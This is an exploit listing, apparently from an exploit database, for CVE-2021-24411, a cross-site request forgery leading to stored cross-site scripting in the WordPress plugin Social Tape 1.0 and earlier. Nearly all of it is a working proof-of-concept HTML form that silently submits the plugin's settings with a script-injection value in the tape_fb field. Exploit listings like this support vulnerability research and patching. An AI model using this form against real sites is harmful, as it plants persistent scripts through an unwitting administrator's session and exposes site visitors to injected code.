Exploit for Social Tape <= 1.0 - CSRF to Stored XSS CVE-2021-24411

Name: Exploit for Social Tape <= 1.0 - CSRF to Stored XSS CVE-2021-24411
Rating: 5 (365 reviews)

2021-07-19 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=social-tape/social_tape.php" method="POST">
      <input type="hidden" name="oscimp_hidden" value="Y" />
      <input type="hidden" name="tape_fb" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="tape_tb" value="" />
      <input type="hidden" name="tape_gp" value="" />
      <input type="hidden" name="tape_da" value="" />
      <input type="hidden" name="tape_tw" value="" />
      <input type="hidden" name="tape_yt" value="" />
      <input type="hidden" name="tape_ytlink" value="" />
      <input type="hidden" name="Submit" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>